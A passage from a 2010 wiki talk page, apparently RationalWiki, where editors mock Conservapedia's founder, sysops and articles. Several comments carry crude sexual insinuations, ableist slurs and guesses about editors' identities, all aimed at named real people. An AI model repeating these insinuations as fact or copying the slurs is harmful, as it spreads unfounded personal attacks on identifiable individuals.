it into a section of the main Abortion article, and has edited the Abortion & Hitler article many times. Whoa. Rodlen (talk) 02:07, 20 April 2010 (UTC) Poe's paradox[edit] An astonishing fact that I've discovered recently is that even parody by a known parodist can have a nauseating effect. Just Take JacobB for example, we all know that he is a parodist, same thing with DouglasAdams, yet when JacobB stole the work of another editor people were legitimately upset about it. I reread Andy's letter to PNAS and was pissed off at it, but it didn't nullify any of my anger knowing the DinsdaleP was permabanned when he got fed up with parody and started simply trolling. I'm having a hard time sussing out whether it is just another mental disconnect that causes me to enjoy and revile these people, or if it is because, as poe's law dictates, parody is by in large the same to read as fundamentalism. I remember back in 2003 thinking that fox news was ridiculous and feeling like most of america agreed with me, yet since then the pendulum has swung and most (53%?) of America will say with a straight face that Fox news if fair and balanced. I can't help but worry that an uncareful but effective parodist might in the end do more harm than good. :/ Thoughts? --Opcn (talk) 00:05, 19 April 2010 (UTC) - Parodists are boring on CP. We want pure, unadulterated Andy insights! ħuman 00:13, 19 April 2010 (UTC) - I agree, but in order to make these insights from Andy blossom, it needs a bit of parodist pollen to stimulate it. NorsemanCyser Melomel 13:56, 19 April 2010 (UTC) - I'm 100% with Human. That said, do people really think I was a parodist/troll when I was on CP? If anything, I was trying to speak for the other side (i.e. reasonable people) on issues where I felt something needed to be said, but I'd never supported or advocated vandalism or parody because they're boring, unimaginative and lame. Even master parodists like Bugler can only hope to point out the validity of Poe's Law, and since that's long been established what's the point of any more? In the end, the best reason TK could scrape up for permabanning me and silencing my consistent display of reality's known liberal bias was over my membership here, and that's a coward's excuse. --SpinyNorman (talk) 01:24, 19 April 2010 (UTC) - Fancy a coward who debates poorly relying on a crummy and contrived excuse to block you. No, I don't think you were a parodist or troll at all. There are 2 brands of parody that I detest and you didn't do either. I hate this current course of terrorizing users and parroting TK's smug but substanceless patter and Andy's extremely unique worldview (nobody and I mean nobody could possibly agree with Andy on the wackier stuff he repeats, but here we have guys like JacobB putting banners chilling discussion on the relativity page). I guess you could cram Bugler into that category. He was odious. Then there's the stupid obvious stuff like that clown's wiretap and abortion articles we were discussing earlier. Do you feel like you fit anywhere on these two extremes? I don't. That turned into a big back-pat. Cheers. 02:55, 19 April 2010 (UTC) Conservative Bible Project[edit] I'm amazed. Conservapedia has almost finished the New Testament in their Conservative Bible Project. This is not a good sign. Rodlen (talk) 00:33, 19 April 2010 (UTC) - It's not? X Stickman (talk) 01:02, 19 April 2010 (UTC) - It's a great sign. The systematic removal of compassion from the Bible is very funny.-- talk 01:34, 19 April 2010 (UTC) - I'm looking forward to being able to rebut CP arguments using their own bible. – Nick Heer 02:08, 19 April 2010 (UTC) - I'm with AD. it's a great sign. I'm waiting with baited breath to announce this grand achievement. Tetronian you're clueless 02:38, 19 April 2010 (UTC) - I'm intrigued, just what are you baiting your breath with? Lily Inspirate me. 07:39, 19 April 2010 (UTC) - I look forward to someone rebutting Andy with Ephesians 4:29. 31 and 32 aren't bad either. --Shagie (talk) 04:56, 19 April 2010 (UTC) - I wont say where, but I will mention that somewhere in the CBP I did backronym Colbert in and it is still standing. --Opcn (talk) 05:29, 19 April 2010 (UTC) - I added "singes" plus "e". But I won't say where. ħuman 08:09, 19 April 2010 (UTC) - Yeah, but what you don't know is that you were inspired by the holy spirit to do those things. You're working for Jesus on Satan's dime, suckers. ;) --JeevesMkII The gentleman's gentleman at the other site 12:08, 19 April 2010 (UTC) Standby for a Crap Joke from DeltaStar communications[edit] Isn't this a Sex Pistols song? DeltaStarSenior SysopSpeciationspeed! 09:53, 19 April 2010 (UTC) - Funny but the first two edits to that page made by user Newton and the following two by user Conservative. Coincidence? Lily Inspirate me. 09:58, 19 April 2010 (UTC) An Ed Poor favourite.....[edit] ...Heh.img Stayed like that for nearly 2 years. Acei9 10:02, 19 April 2010 (UTC) - Extra laughs hereimg. Acei9 10:04, 19 April 2010 (UTC) - Yes indeed. ħuman 10:26, 19 April 2010 (UTC) - Heh heh, good spot. Poor Ed Poor must have been distracted mid way through that last sentence. For two years. Good article though, they just need some other articles to wikilink to 'The closet' to make use of Ed scholarly efforts. DeltaStarSenior SysopSpeciationspeed! 10:36, 19 April 2010 (UTC) - It's nice to see that others nurtured his stub and grew it into an article. Isn't that what they call 'standing on the shoulders of giants'? Lily Inspirate me. 10:41, 19 April 2010 (UTC) - hahahaha :D rational ghey (talk) 14:05, 19 April 2010 (UTC) - (ec) Or giants were standing on Ed's shoulders. Or something like that. On a related note, here is your piece of hate for today: "[False outings] can ruin the reputation of an innocent, respectable person.". in·no·cent, adj: 1. not homosexual. [2] — Pietrow ☏ 14:10, 19 April 2010 (UTC) - I'm imagining Ed's inner monologue..."Homosexuality is bad, homosexuality is bad, homosexuality is bad, stub, stub stub, homosexuality is bad, homosexuality is bad, homosexuality is bad, stub, stub, stub, homosexuality is bad...hey, new user, stubs are bad! - Do as Ed says, not as we all know he probably does. — Sincerely, Neveruse / Talk / Block 14:29, 19 April 2010 (UTC) - Can't you get prosecuted in some countries for saying things like Ed has here? 14:34, 19 April 2010 (UTC) - As a Freudian Psych student, I have to question this: "(Subject:) To Jack (Message:) Two heads are better than one - Ed Poor. [3] SirChuckBA product of Affirmative Action 16:19, 19 April 2010 (UTC) Re: the category, Ed (as you know) has these articles strewn all over that defied categorization, so I finally gave up. In theory he'd have one handy category that he could hypothetically go to and solve the problems, but (i think) I got a warning for vandalism after a couple of them so I gave up. 173.10.105.29 (talk) 17:21, 19 April 2010 (UTC) I know they don't like Richard Dawkins...[edit] ...but are they saying he's not humanimg any more?img Well done that vandal! proper capimg DeltaStarSenior SysopSpeciationspeed! 18:41, 19 April 2010 (UTC) - I'm amazed that the Dawkins picture was there for so long. Tetronian you're clueless 18:42, 19 April 2010 (UTC) - The Assfly also dishes out 5 year bansimg for pointing out that humans are primates.imgDeltaStarSenior SysopSpeciationspeed! 18:52, 19 April 2010 (UTC) - Capt. Mei (talk) 18:59, 19 April 2010 (UTC) - Somehow this reminds me of Keynesian beauty contest. K61824TK = Terry Koeckritz 19:51, 19 April 2010 (UTC) - I love how one of the categories is "Creations of God", but when you go to the category listing, only homo sapiens are listed. A backhanded way to admitting that perhaps all other life evolved? --BMcP - Just an astronomy guy 00:13, 20 April 2010 (UTC) Check the IP block log. Seems like they now have some tools to autoblock IP of a user when they block said user. ThiehTK = Terry Koeckritz 01:30, 20 April 2010 (UTC) - That's a standard MW feature - in fact that box is checked off by default. ħuman 01:39, 20 April 2010 (UTC) Whichever asshole rewrote my WIGO[edit] did a great job, thanks! --Opcn (talk) 05:46, 20 April 2010 (UTC) Translation[edit] I wonder what software Andy used to mangle up his anti-Brown commentimg? I wouldn't have commented on it if Herr Schlafly didn't make such a big issue of other people's spelling and grammar in the first place. Lily Inspirate me. 16:27, 19 April 2010 (UTC) - He dropped a D at the end of rescue. For some reason he hates the letter D. Totnesmartin (talk) 18:06, 19 April 2010 (UTC) - Dememoryholed CS Miller (talk) 18:16, 19 April 2010 (UTC) - Dememoryhole is a word he hates. As is Darwin. And Democrat. Totnesmartin (talk) 19:01, 19 April 2010 (UTC) - "Rescuing people IS DECEITFUL!" I just love the way Andy is meddling in British politics now. It gives him all new things to bitch about. Vulpius (talk) 21:40, 19 April 2010 (UTC) - Speaking of deceit, what's the betting that when the Tories almost inevitably win the election, Andy and Co. will be congratulating them on a marvellous victory for ConservatismTM, conveniently forgetting all the times they previously denounced the Tories as Not Real True Conservatives? --JeevesMkII The gentleman's gentleman at the other site 12:43, 20 April 2010 (UTC) - Vulpius, to be fair to Andypants, his read on Brown sending the Navy to rescue holidaymakers is spot on imo Iatrogenic (talk) 17:58, 20 April 2010 (UTC) Can people please effing stop highlighting new parodists[edit] It's getting boring for us and annoying for the parodists hoping to work their way up the greasy conservapedia pole (shudder). It seems to be happening more and more, yes - by all means discuss sysops whom you reckon to be Poeing it; but not some new user with a dozen edits. For eff's sake. DeltaStarSenior SysopSpeciationspeed! 21:58, 19 April 2010 (UTC) - THIS. Totnesmartin (talk) 22:02, 19 April 2010 (UTC) - Mine was a joke, sorry. Like I would be that dumb to create a username of my same real name & random letter. Candlewick 22:13, 19 April 2010 (UTC) - Man down. I was SamuelC. Rodlen (talk) 00:57, 20 April 2010 (UTC) - Nice work buddy! What do you think gave your game away? (PS. Don't say too much if it will thwart your future plans, TK reads here all the time) DeltaStarSenior SysopSpeciationspeed! 11:06, 20 April 2010 (UTC) - I think it was a mixture of three things: the focus on one subject (abortion and evolution), the shortness of the articles, and the fact that my parody articles were linked to here as parodies. Rodlen (talk) 22:39, 20 April 2010 (UTC) Andy's latest comment[edit] This is a bit too muchimg, even for me. Does the man refuse to ever leave the country? DickTurpis (talk) 00:32, 20 April 2010 (UTC) - ! yummy & honey(or marmalade) 00:36, 20 April 2010 (UTC) - Yeah, because I'm sure that's what they're thinking about... </sarcasm> Tetronian you're clueless 00:39, 20 April 2010 (UTC) - Wow, that comment is... wow... --Sid (talk) 00:40, 20 April 2010 (UTC) - Wow... So the Church of England both exist and not exist simultaneously? Schrödinger's Church FTW! K61824What is NOT going on? 01:32, 20 April 2010 (UTC) - Most American fundamentalists consider the Anglican Church to be irredeemably liberal and secular. Interestingly, the CP article on the Church of England is very neutral, so either Andy and Co. disagree or that article is stolen. Colonel of Squirrels白山羊不山羊。商讨。 04:38, 20 April 2010 (UTC) - I checked the CoE article and, aside from a section that would qualify as plagiarism in J-school, it doesn't appear to be stolen. An original article on CP which is informative and neutral? Well, I never. Colonel of Squirrels白山羊不山羊。商讨。 05:05, 20 April 2010 (UTC) - That comment is just... words cannot describe. He's getting worse every day. CrundyTalk nerdy to me 09:57, 20 April 2010 (UTC) It's a mistake to allow these people back in to the US. How are we to know that they've not been corrupted by liberal atheistic Brits to return home as Manchurian candidates? Andy, suggest they be dumped at sea! Ask me about your mother 10:45, 20 April 2010 (UTC) - The man is a numpty. However, crazy utterances like this are perfect for screencapping the whole page, and adding it to CP's WP article. That way, even more people get to see Andy's insane rantings. --PsyGremlinSermā! 10:53, 20 April 2010 (UTC) - That doesn't even make sense. How can there be lack of belief in gods everywhere you look? Hang on, I'm looking out my window now, and I can't see a church - does that mean I am looking at atheism? What a cockend. PS. I agree with Psy - this is exactly the kind of shit that needs adding to the WP article. DeltaStarSenior SysopSpeciationspeed! 11:11, 20 April 2010 (UTC) - Done. Nice thing is, Terry & Rob can't even moan about it, because all we've done is update the front page of CP on WP, which is the True and Only Word of Andy. Gotta love how the "news" section carries on for miles past the "info" section. --PsyGremlin講話 11:51, 20 April 2010 (UTC) - Psy, you left your IP on that screenshot. CrundyTalk nerdy to me 12:48, 20 April 2010 (UTC) "Stoopid" WIGO[edit] Worst story telling ever. Every link is to the same diff, and except the first, none "highlight" anything to make their point. Should probably be rewritten. ħuman 02:17, 20 April 2010 (UTC) - Whoever added it was trying to link directly to the citations, apparently unaware that the Capturebot doesn't work that way. Since all the citations are listed in the source code anyway, I think we can safely delete every link after the first. Colonel of Squirrels白山羊不山羊。商讨。 04:32, 20 April 2010 (UTC) - I went to the direct links, they failed also after the first one. It desperately needs rewriting by someone for whom 1) English is a first language and 2) wiki is a second. ħuman 04:36, 20 April 2010 (UTC) - So stop complaining and rewrite it already damnit!! Keegscee (talk) 04:37, 20 April 2010 (UTC) - There's so little to write. It's a crappy wigo, the person who first posts this crap should get their "joke" together. I removed the redundant links. By the way, "The intelligence of humans is rapidly declining" is at odds with IQ tests needing to be renormed every decade or so (scores are rising a few percent per decade). WIGO is lame because it just says "ha ha" and adds nothing. ħuman 04:41, 20 April 2010 (UTC) - I gave it my best shot. Keegscee (talk) 04:48, 20 April 2010 (UTC) - Thanks. I spend most of my time "rewriting" mainspace stuff. I expect wigos to tell a joke or story and make sense, so when I opened five tabs and they were all identical, well, you can understand my reaction. I hope your new version fares well and amuses people! ħuman 04:56, 20 April 2010 (UTC) - OK, well I'll take your suggestions and try to make my future WIGO entries a little better. I appreciate you editing it, I especially like the picture of Assfly at the end. I guess you guys don't get my sense of humour though because I thought it was funny the way I wrote it. I was trying to make the point that Assfly is saying people are stupid, but for proof only offers up unsupported footnotes, hence he's the stupid one (ha ha). That was the point and I thought that was actually funny, but I guess the execution didn't quite work out. And yes, English is my first language. Wiki is not a second though! Diavolos (talk) 13:57, 20 April 2010 (UTC) hehe irony[edit] was anybody else amused that the most recent criticized ken for a news item that used the same link 3 or 4 times, and the wigo below it had to be rewritten so that it wouldn't have the same link 3 or 4 times? 07:11, 20 April 2010 (UTC) - It's time to black up and have a pot party. Lily Inspirate me. 07:15, 20 April 2010 (UTC) - ROTFL! ħuman 10:05, 20 April 2010 (UTC) - Ours used the same link, albeit with "different" #reflinks, five times. Still, Ken's news thing screams "please give me national health care so I can afford my meds every month!" Ours was just short term epic fail. ħuman 10:07, 20 April 2010 (UTC) - It is, however, good to know that god continues to sit securely on his throne. Wouldn't want him to fall off and accidentally crush the earth with an elbow or something. If I may deign to offer some advice to the almighty, he ought to get up and have a walk around every now and then. Deep vein thrombosis is a killer, you know. --JeevesMkII The gentleman's gentleman at the other site 12:56, 20 April 2010 (UTC) It's TK, so it isn't really even worth mentioning, but still...[edit] Why is this news? A governor 3 months into term (still in the honeymoon period) has an approval rating of 53% and that's supposed to be exceptionally good? It's not too bad, I guess, but Obama was over 65% at this point in his term. Meh. It's TK. DickTurpis (talk) 17:49, 20 April 2010 (UTC) - Wake me up when Andy does something hilarious. — Sincerely, Neveruse / Talk / Block 18:02, 20 April 2010 (UTC) - TK's a troll who thrives on negative attention. Please to ignore unless he's addressing you directly. 18:08, 20 April 2010 (UTC) - I'd ignore him even then. Vulpius (talk) 18:20, 20 April 2010 (UTC) - That's the thing. If it were your standard "liberals are evil Nazis" thing I'd pass it off as regular TK. This is him trying to show how good his side is by trumpeting some lackluster statistics. It's almost counterproductive. I assumed Andy wrote it at first, because it's his some turf and he has a stake in the game there (especially in his recall campaign). This makes little sense. DickTurpis (talk) 19:08, 20 April 2010 (UTC) - It's actually mildly counter-Andy, as Andy has been tagging Christie with being a RINO for ... I don't know, some local New Jersey bullshit... 173.10.105.29 (talk) 19:31, 20 April 2010 (UTC) - I'm not surprised that he's tagged Christie as a RINO, since he's ignored social issues (which Andy loves) and has instead decided to focus on cutting every piece of state spending that isn't nailed to the floor. Tetronian you're clueless 20:06, 20 April 2010 (UTC) - Also don't forget that the poll he cites is Rasmussen, whose poll model counts a Democrat as only 3/5ths of a vote of a Republican. --Leotardo (talk) 21:03, 20 April 2010 (UTC) - That can be sound policy. In the UK there is a difference between what opinion (and even exit) polls say what will happen, and what actually happens, normally under-reporting Tory votes. If this is known to happen, then it it wise to scale one party's intention-to-vote by the observed intention-to-vote to actual-vote ratio. 62.56.63.226 (talk) 21:42, 20 April 2010 (UTC) - That article is a real eye-opener. Thanks for posting it! Tetronian you're clueless 01:27, 21 April 2010 (UTC) Andrew Schlafly in the Princeton Alumni Weekly[edit] I finally had time to catch up on recent issues of the Princeton Alumni Weekly magazine, and I was astonished to find an interview with our favorite conservative in the February 24 issue. And the April 7 issue has responses from fellow graduates: "No more of Mr. Schlafly’s know-nothing brand of conservatism!" [4] "God did not bring a Bible into existence to primarily turn Americans or anyone into political conservatives." [5] "I find his replies such total nonsense that I have to ask: Is this a leg pull?" [6] "I learned about the use of B.C.E. and C.E. in Hebrew school. I had no idea I was attending an atheistic and liberal religious institution." [7] - Cuckoo (talk) 16:48, 19 April 2010 (UTC) - Nice find. The shirt!!! Well, someone finally took a halfway decent picture of Andy. — Sincerely, Neveruse / Talk / Block 16:58, 19 April 2010 (UTC) - That made me snort. --Shagie (talk) 17:29, 19 April 2010 (UTC) - Comments aren't available. Too bad. My Princeton alum friend is disappointed this hate-filled and deliberately ignorant man was interviewed as if he were just another Princeton grad. He's not. 17:58, 19 April 2010 (UTC) - "Having read the interview with Andrew Schlafly, I find his replies such total nonsense that I have to ask: Is this a leg pull?" 18:05, 19 April 2010 (UTC) "Logic" that goes in circles like this makes my head hurt. Internetmoniker (talk) 21:05, 19 April 2010 (UTC) Somewhat irrelevant question[edit] What is a leg pull, in that context, anyways? K61824"6+18=24" 23:18, 19 April 2010 (UTC) - "Pulling one's leg" means to prank someone, to tell them something that isn't true in jest. ħuman 23:33, 19 April 2010 (UTC) - It's most common in Britain. I believe the American equivalent refers to "yank ones chain." SJ Debaser 11:10, 20 April 2010 (UTC) - Also "pull one's plonker" or "tug one's todger" or erm I'd better stop now before I go too far off topic DeltaStarSenior SysopSpeciationspeed! 11:23, 20 April 2010 (UTC) - To "yank one's chain" is to provoke someone into a response.... it's not quite the same as pulling a leg, which involves liberal deceit. 194.6.79.200 (talk) 12:49, 20 April 2010 (UTC) - See also: "pull the other one (it's got bells on)" 12:54, 20 April 2010 (UTC) yummy & honey(or marmalade) (unDent) Old practical joke to pull on a friend. Tell them, You know, the strangest thing happened to me today. I was in the checkout line at the grocery store, and I noticed there was an elderly woman in front of me, and she was crying. I said to her, "Ma'am, is everything all right?" She looked back, and said, "you look just like my son. He died about three years ago." "Oh, I'm so sorry to hear that." "Would you mind if I show you his picture?" "Well, okay..." She showed me the picture, and I didn't think I looked like him, but I didn't want to be mean to the woman, so I said, "Yes, there is a resemblance." "Thank you," she said. "Could you do one more thing for me? Could you just call me, 'Mom'?" I thought that was pretty odd, but I felt sorry for her, so I said, "All right... Mom." She finished at the stand, and then the cashier rang up my groceries, and said "that'll be $235, please." "What????" I asked. "There's only about fifty bucks worth here!" The cashier said, "your mother said you'd pay for hers, too!" "Wait just a minute!" I said, and ran out into the parking lot. I saw the old woman, and she was getting into her car. I managed to get close enough to grab her leg, and started pulling it and pulling it.... just like I'm pulling yours now. #rimshot# MDB (talk) 11:39, 21 April 2010 (UTC) Oh Ken![edit] Dawkins article researchimg Doesn't Ken just make you laugh? The idea of someone like him doing research, I mean. And still the bunny down a hole piccy there. 13:50, 20 April 2010 (UTC) yummy & honey(or marmalade) - Ouch! Ouch! Ken is just so embarrassing that I really feel sorry for him. I mean, here's a 40-something guy acting and writing like a remedial class 13-year old (apologies if that sounds un-PC) but he obviously has some talent in an autistic way by searching through mountains of quotes or locating irrelevant YouTube videos. What can his poor mum think of him? She must be an absolute angel to still keep him at home when most of his peers have gone out into the world and got married. Lily Inspirate me. 14:18, 20 April 2010 (UTC) - It's nice to see him with a hobby, since he always struggled to make friends. Hmm, must stock-up on tissues. We always seem to run out of tissues whenever the History Channel has a special on Nazis. Maybe I'll see if he can spend the weekend at that nice Mr Andy's house. Ken was so excited that for a week afterwards he only left his room to fetch biscuits, 7-Up and more tissues for that terrible cold he always seems to have. (Channelling Ken's mum) -- Ask me about our love 15:20, 20 April 2010 (UTC) - The bunny is supposed to be Dawkins? It looks really scared. Perhaps it's a bit of psychological projection... Tetronian you're clueless 20:09, 20 April 2010 (UTC) - When Ken goes on these forays I see Dawkins as King Arthur in MP&THG with the limbless Black Knight of fundamentalism screaming "come back and fight you coward". But of course, in reality it is Ken who shies away from debate. Either by locking his articles at CP, or firing a salvo on a talk page/forum and refusing to continue with the thread when he has been pwned. His habitual deletions of stuff are really a badge of cowardice, in that he doesn't have the cojones to leave his ramblings and outbursts in public view. With the Library of Congress supposedly archiving Twitter tweets it would be funny to have access to Ken's bleats. (Lame spur of the moment joke: The Conservapedia version of Twitter could be called Bitter and their postings would be bleats.) Lily Inspirate me. 03:04, 21 April 2010 (UTC) Speaking of parodists, doesn't anyone wonder why an alleged resident of a small city in the Yucatan is editing articles about American synogogues. ...[edit] [8] and a host of subjects that would be beyond the interest of a retired Mexican academic unless he has particularly urbane interests. Discuss. 14:50, 20 April 2010 (UTC) - Are you outing parodists again Nutty? CrundyTalk nerdy to me 14:52, 20 April 2010 (UTC) - Yeah, I'm on a roll. You're next. 14:55, 20 April 2010 (UTC) - What a coincidence, my old amigo Joaquín from Campeche. I somehow got added to his address book and now receive spam emails because his account has been hacked or infected. Of course these mailings are also sent out to his fellow CP sysops but with all their email addresses in plain view. It's interesting to find how many different ones they use. Especially when Andy mistrusts anyone with a gmail/hotmail email address. They're all wankers and I'm glad that I don't have any dealings with them any more. Silly twit (talk) 15:09, 20 April 2010 (UTC) - I don't wear a sock while having funtime with CP CrundyTalk nerdy to me 15:10, 20 April 2010 (UTC) - You should wear a rubber. That place is a cesspit of infectious diseases like YEC, xenophobia, homophobia, and racism. 15:13, 20 April 2010 (UTC) - How does rubber prevents transmissions of those diseases? K61824Ahh! my eyes!! 15:21, 20 April 2010 (UTC) - We're playing word games. Socks cover your feet but have nothing to do with the internet. Condoms (rubbers) cover your knob, which also has nothing to do with the internet, but don't protect against diseases of the mind. 15:26, 20 April 2010 (UTC) - Clearly one of us is using the internet wrong NR.--Opcn (talk) 18:29, 20 April 2010 (UTC) - Why are you saying my knob has nothing to do with the internet? — Sincerely, Neveruse / Talk / Block 18:32, 20 April 2010 (UTC) - ERrr, I was referring to Thieh's knob, not either of yours. Your knobs can continue being famous on the internet. 18:49, 20 April 2010 (UTC) - If anyone is interested, I'll be on chatroulette. — Sincerely, Neveruse / Talk / Block 19:00, 20 April 2010 (UTC) - I hadn't heard of that site until my friend showed it to me a month or so ago... I didn't care for it. SJ Debaser 19:06, 20 April 2010 (UTC) - I recently heard about it in a NYTmes Op-Ed piece, which described it as creepy and pretty pointless. Tetronian you're clueless 20:07, 20 April 2010 (UTC) - So a lot like the NYTimes Op-Ed page, then. --The Emperor Kneel before Zod! 22:51, 20 April 2010 (UTC) - David Thorne didn't care much for it either. CrundyTalk nerdy to me 07:53, 21 April 2010 (UTC) How The Mind Works: Andy[edit] Not earth-shattering by any means, but this little comment by Andy really sums up the way his mind (doesn't) work. Andy and DanP are debating how William Penn (found of Philly) came up with the name "Philadelphia". So Andy sez he'll do a little research, but that "anti-Christian bias from internet searching may make the truth harder to find than usual". I mean, really? Andy thinks that there's some sort of anti-Christian Internet cabal censoring search engine results to keep Christian history buried? And what's funny, too, is that the answer to the query is that Penn pinched the name "Philadelphia" from a city of the same name mentioned in Revelation. You'da thunk Mister Bible Genius Andy Schlafly--who claims to have studied the Bible cover to cover--woulda known that...--WJThomas (talk) 02:07, 21 April 2010 (UTC) - Andy's position on the Bible strikes me as untenable. On the one hand, he claims to be knowledgeable enough to "translate" it effectively. On the other hand, he is emphatically not an expert...so what is he? In his mind, he's some kind of ubermensch who is still technically an amateur. But, in reality, he is obviously nowhere close to being a Bible scholar. Tetronian you're clueless 02:31, 21 April 2010 (UTC) - I have always admired those people who could remember a book verbatim from cover to cover. Unless you master memory tricks to do so it is largely a question of leaning by rote. So have all these bible-spouting fundamentalists memorised the entire book? I suspect not, they probably focus on the mainstream stories, essential teachings and/or those bits that support a particular viewpoint, especially those backed up with eternal damnation, brimstone and hellfire. Lily Inspirate me. 02:45, 21 April 2010 (UTC) Phil·a·del·phi·a 1. An ancient city of Asia Minor northeast of the Dead Sea in modern-day Jordan. The chief city of the Ammonites, it was enlarged and embellished by Ptolemy II Philadelphus (285-246 b.c.) and named in honor of him. Amman, the capital of Jordan, is now on the site. 2. The largest city of Pennsylvania, in the southeast part of the state on the Delaware River. It was founded as a Quaker colony by William Penn in 1681 on the site of an earlier Swedish settlement. The First and Second Continental Congresses (1774 and 1775-1776) and the Constitutional Convention (1787) met in the city, which served as the capital of the United States from 1790 to 1800. Etymology: Gr philadelphia, brotherly love < philos, loving + adelphos, brother - Refugeetalk page 05:32, 21 April 2010 (UTC) - "anti-Christian bias from internet searching may make the truth harder to find than usual" cracked me up. ħuman 07:15, 21 April 2010 (UTC) - It is an amazing example of Andy's final paranoid days in the bunker. I imagine him calling tech support, claiming that atheists are preventing his modem from getting a dial tone. Sure it could be the 5 phones and numerous splitters overloading his line, but it seems more likely that those darn atheists are to blame. Andy, you fail at Bible and Google! Ask me about our gyroscope 18:48, 21 April 2010 (UTC) Fatwah?[edit] TK Uploads and inserts a piccy of the Prophet. Wonder where he found it? 07:18, 21 April 2010 (UTC) yummy & honey(or marmalade) - Where you found it, at least. The 'source' says they "found it on the internet" so I don't think your hunt is over yet! ħuman 07:46, 21 April 2010 (UTC) - Actually the Great Klepto says he found it here. Lily Inspirate me. 09:24, 21 April 2010 (UTC) AllenShaw[edit] Whoever it is, knock it off. Do you really want Ed Poor classics deleted? Or are you just trying to goad Ed into defending their existence? As funny as that would be, some of them are just too good to lose. Please stop. Or at least be very careful. — Sincerely, Neveruse / Talk / Block 15:53, 21 April 2010 (UTC) - I say nuke the bastards. Let Ed face the truth. EddyP (talk) 15:57, 21 April 2010 (UTC) - Well, it'll be interesting to see them explain that thisimg isn't pop culture, just because Creepy Uncle Ed masturbated while watchingwrote it. --PsyGremlinFale! 16:05, 21 April 2010 (UTC) - I love this edit commentimg. How does this retard take himself seriously? DickTurpis (talk) 16:46, 21 April 2010 (UTC) - - Proxy link, Dick. I fixed...P-Foster (talk) 16:50, 21 April 2010 (UTC) Nothin' like censorship[edit] What an awesome deletion log they got goin' on over there at CP... rational ghey (talk) 18:21, 21 April 2010 (UTC) - I'm just waiting for them to delete The Beatles. DickTurpis (talk) 18:46, 21 April 2010 (UTC) - It's not quite on the same level as The Beatles, but deleting Nirvana was pretty bad. Keegscee (talk) 18:49, 21 April 2010 (UTC) - Pah, those guys weren't even as popular as Jesus. *Leaves to see if CP has an article for Stryper* Ask me about our alpaca sandwich 18:53, 21 April 2010 (UTC) - Pretty sure they deleted that in the screenshot wigo. They also deleted Genesis. It's like... why? ;_____________; Mei (talk) 18:57, 21 April 2010 (UTC) - Deletion is the new parody. Tetronian you're clueless 02:17, 22 April 2010 (UTC) Merging dup vote counts[edit] I've just deleted a duplicated WIGO entry. Is there any way to add the votes for the second one to the first? CS Miller (talk) 18:33, 21 April 2010 (UTC) - One despairs of the reading ability of people: "Don't remove entries." it says above the edit box. 18:52, 21 April 2010 (UTC) yummy & honey(or marmalade) - OOPS: Sorry CSM You didn't remove it: you commented it out Many apologies. No don't think there is any way of adding the votes. yummy & honey(or marmalade) 18:56, 21 April 2010 (UTC) - Don't worry Toastie; I should have been clearer that I'd just commented it out, rather than removed it from the article. The voting for the second WIGO was +2; not sure what the total votes was, if there is even an easy way to find out. CS Miller (talk) 20:05, 21 April 2010 (UTC) Karajou Strikes Back[edit] Karajou's been on a tear over the last hour, pulling speedy delete tags off of articles. I guess he figured out AllenShaw's scheme to trick CP into committing suicide. The de-tagged pages were all anime and movie articles and Uncle Ed's weird tech support stuff. And thus, CP's criteria for determining "pop culture" become ever more arbitrary. Colonel of Squirrels白山羊不山羊。商讨。 18:55, 21 April 2010 (UTC) - I've always thought that (metaphorically speaking) Karajou is the smallest man on the wiki. He just barely beats out Jinxy. — Sincerely, Neveruse / Talk / Block 18:57, 21 April 2010 (UTC) Andy, Cameron and eggs[edit] Not WIGO worthy, but apparently David Cameron got hit by an egg, prompting Andy to write on the News Feed Liberal values are great, aren't they? The reaction by the liberal media and police would have been very different if an egg had been thrown at a liberal politician. It really, really wouldn't. Remember when John Prescott got egged and he decked the guy that did it? Or how about Lord Mandelson getting green crap thrown all over him last year? SJ Debaser 19:20, 21 April 2010 (UTC) - Well I doubt Andy know the first thing about British culture, history, or politics. --BMcP - Just an astronomy guy 19:36, 21 April 2010 (UTC) - I think that we generally piss ourselves when any politician is egged or slimed. yummy & honey(or marmalade) 19:42, 21 April 2010 (UTC) - Cameron just lost points by not decking the guy, basically - David Gerard (talk) 19:54, 21 April 2010 (UTC) - Err. The Times is right-leaning (but not as much as the Torygraph). CS Miller (talk) 20:28, 21 April 2010 (UTC) - The Times is a Murdoch paper, and, as such - much as 'Merkins will have experienced from the Wall Street Journal since he bought it - The Sun with bigger words and less tits. Murdoch is not happy with recent polls. But this is veering even more off-topic than usual ... - David Gerard (talk) 20:43, 21 April 2010 (UTC) - The politics of The Times is whatever bolsters the greater profits of News International or related Murdoch-owned companies. Lily Inspirate me. 00:50, 22 April 2010 (UTC) - Mmmm, eggs. Personally I prefer omelettes or over-easy eggs on toast. ħuman 01:37, 22 April 2010 (UTC) - Yuh, that's what I said ;-) Also, The Sun (hence directive from Murdoch) is officially backing the Tories - David Gerard (talk) 06:06, 22 April 2010 (UTC) Birther state[edit] WIGO world: "Arizona (motto:"God Enriches") becomes the "Birther" state." Isn't there someone we all know who lives in Az? 20:24, 22 April 2010 (UTC) yummy & honey(or marmalade) - Since none of the CP Admins live there, move to Saloon or WIGO Talk:World? K61824Looking for potion recipes 20:27, 22 April 2010 (UTC) - Oops Confusing my states: Nevada =/= Arizona. Please ignore this section. 20:30, 22 April 2010 (UTC) yummy & honey(or marmalade) Someone tell this to Andy (Lenin birthday WIGO)[edit] First Earth Day is observed in 1970, exactly the 100th birthday of Vladimir Lenin. Bonus: Jane Froman Died on the 10th Earth day. More Hollywood values for you. I am interested in what kind of lulz it leads to. K61824"6+18=24" 20:30, 22 April 2010 (UTC) Yes, I wonder if they will note this.-- talk 23:52, 22 April 2010 (UTC) Probably, they will.-- talk 23:53, 22 April 2010 (UTC) Cp Sysops are bored[edit] They must be bored at CP these days. With so few new users joining, there are not enough to block to keep them busy, so they've started deleting accounts of old users who were already blocked. (Causing red links all over pages) and deleting users who had never edited or had few edits. Then they actually began re-creating User pages, just to delete them again. (Hojimachong?) Now they are deleting tons of pages full of content: rock bands, singers, video games, movies, and anything else that they feel like calling "pop culture". The site is growing rapidly? Soon there will be nothing left of the wiki at all. Refugeetalk page 06:14, 21 April 2010 (UTC) - Yeah. DouglasA did some good work tonight. He's got to be careful, though, because he's drawing a lot of attention to himself. Keegscee (talk) 06:19, 21 April 2010 (UTC) - Who was that band Terry Koekritz allegedly sat in on sessions of? Hope they haven't been "popcultured" into oblivion. (I note Ken checked a couple of Xtian ones [restore/redelete]) 06:23, 21 April 2010 (UTC) yummy & honey(or marmalade) - Do you think it ever occured to them to start improving the quality of some of their lesser articles via research? That would fill in sometime. - π 